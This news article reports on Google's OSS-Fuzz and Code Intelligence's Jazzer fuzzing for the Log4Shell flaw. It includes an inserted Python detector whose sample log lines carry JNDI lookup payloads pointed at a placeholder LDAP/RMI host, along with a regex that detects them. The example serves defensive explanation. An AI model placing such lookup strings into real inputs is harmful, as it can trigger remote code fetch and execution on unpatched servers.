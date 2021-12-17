



A remotely exploitable flaw in Log4j, the widely deployed Java error-logging library, is being attacked by multiple actors, and the work of patching open source projects, vendor products, and end-user organizations' affected systems may continue for the next few months.

Google is now adding OSS-Fuzz to its pool of answers to the Log4j flaw (also known as Log4Shell) across the Internet. The bug is tracked as CVE-2021-44228 and was partially fixed in the Apache Foundation's release of Log4j version 2.15.0 last week.

OSS-Fuzz is Google's free service for fuzzing open source software projects and is currently used by over 500 critical projects. Fuzzing feeds random or malformed input into software, triggering errors such as crashes and revealing potential security flaws.


To look for Log4Shell-like weaknesses in newly built open source software, Google has partnered with security company Code Intelligence to provide continuous fuzzing for Log4j.

Code Intelligence created Jazzer, an open source fuzzing engine that is now part of OSS-Fuzz, and modified it to identify the Log4j vulnerability in code under development. Google has awarded Code Intelligence $25,000 for its Log4j fuzzing efforts.

“Because Jazzer is part of OSS-Fuzz, similar vulnerabilities are continuously being searched for in all integrated open source projects written in Java and other JVM-based languages,” Code Intelligence said in a press release.

Jazzer can also detect remote JNDI lookups, which is a strong sign that a potential attacker could probe your network for flaws.

JNDI (Java Naming and Directory Interface) is an interface for connecting to directories on a Lightweight Directory Access Protocol (LDAP) server, and the Log4j flaw lies in its JNDI implementation.

As described by Cisco Talos researchers, the flaw allows a remote attacker to use a simple LDAP request to trigger the vulnerability in Log4j versions prior to 2.15, after which a payload fetched from the remote server can be run locally on the vulnerable device.

The Apache Foundation released Log4j version 2.16.0 this week to fix a second, related JNDI flaw, tracked as CVE-2021-45046. This flaw allowed an attacker to craft input data containing a JNDI message lookup pattern and take the machine down with a denial of service (DoS).

Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP, and LDAPS. Disabling JNDI was previously a manual step for mitigating attacks on the original flaw.
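The two ideas above, spotting `${jndi:...}` lookup patterns in data that reaches a logger and deciding whether a lookup would be permitted under the "JNDI disabled by default, only java/ldap/ldaps allowed" policy, can be shown with a small model. The following is an added example written for this article; it is not Log4j's own lookup code and not Jazzer's sanitizer. The regex, the `JndiPolicy` class, the `classify_lookup` outcome labels and the sample log lines are all constructed for the demo, and the code never performs a real JNDI or LDAP call, it only classifies what it would be asked to resolve.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed pattern for a Log4j-style JNDI lookup token: ${jndi:<name>}.
# Real Log4j parses lookups with its own StrSubstitutor; this is only a model.
LOOKUP_RE = re.compile(r"\$\{jndi:(?P<name>[^}]*)\}")


@dataclass(frozen=True)
class JndiPolicy:
    """Hypothetical policy object mirroring the two settings the article names.

    enabled=False models the 2.16.0 default (JNDI access disabled).
    allowed_schemes models the default protocol restriction to java, ldap, ldaps.
    """
    enabled: bool = False
    allowed_schemes: frozenset = frozenset({"java", "ldap", "ldaps"})


def find_jndi_lookups(message: str) -> list:
    """Return every JNDI lookup name embedded in a log message string."""
    return [m.group("name") for m in LOOKUP_RE.finditer(message)]


def classify_lookup(name: str, policy: JndiPolicy) -> str:
    """Decide what the policy would do with one lookup name.

    Returns one of the constructed labels:
      'blocked:disabled'  JNDI lookups are switched off (2.16.0 default)
      'blocked:scheme'    the URI scheme is outside the allowed protocol list
      'allowed'           the lookup would be attempted
    """
    if not policy.enabled:
        return "blocked:disabled"
    scheme = urlsplit(name).scheme.lower()
    if scheme not in policy.allowed_schemes:
        return "blocked:scheme"
    return "allowed"


def scan_log_lines(lines: list) -> list:
    """Detection pass over raw log lines.

    Returns (line_number, [lookup names]) for each line that carries a JNDI
    lookup token, the indicator a defender wants to alert on.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        names = find_jndi_lookups(line)
        if names:
            hits.append((number, names))
    return hits


# Constructed sample web-server log lines; "lookup.example" is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:rmi://lookup.example/b}"',
    '10.0.0.7 - - "GET /health HTTP/1.1" 200 "curl/7.79"',
]


if __name__ == "__main__":
    for number, names in scan_log_lines(SAMPLE_LOG):
        for name in names:
            print(number, name,
                  "2.16-default:", classify_lookup(name, JndiPolicy()),
                  "jndi-enabled:", classify_lookup(name, JndiPolicy(enabled=True)))
```

Running the block prints one row per detected lookup: under the 2.16.0-style default every lookup is `blocked:disabled`; with JNDI switched back on, the `ldap://` name is `allowed` by the protocol list while the `rmi://` name is `blocked:scheme`. The split between `scan_log_lines` (what to alert on) and `classify_lookup` (what the library would do) is deliberate: detection should fire on the token regardless of whether the deployed version would actually resolve it, because the token in inbound data is itself the signal that someone is probing.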

Currently, most efforts are focused on vendors updating Log4j in their products and on end-user organizations applying those updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) is giving federal agencies until December 24 to identify all applications affected by Log4Shell. Cisco, VMware, IBM, and Oracle are busy developing patches for affected products.


Google's OSS-Fuzz aims to tackle Log4j from a different angle: preventing developers from accidentally introducing similar flaws into new software projects that may eventually be deployed in production.

“Vulnerabilities like Log4Shell are stunning to the industry in terms of new attack vectors. OSS-Fuzz and Jazzer allow us to detect this class of vulnerabilities, which is a problem in production code. It can now be fixed before,” says Jonathan Metzman of the Google Open Source Security Team.

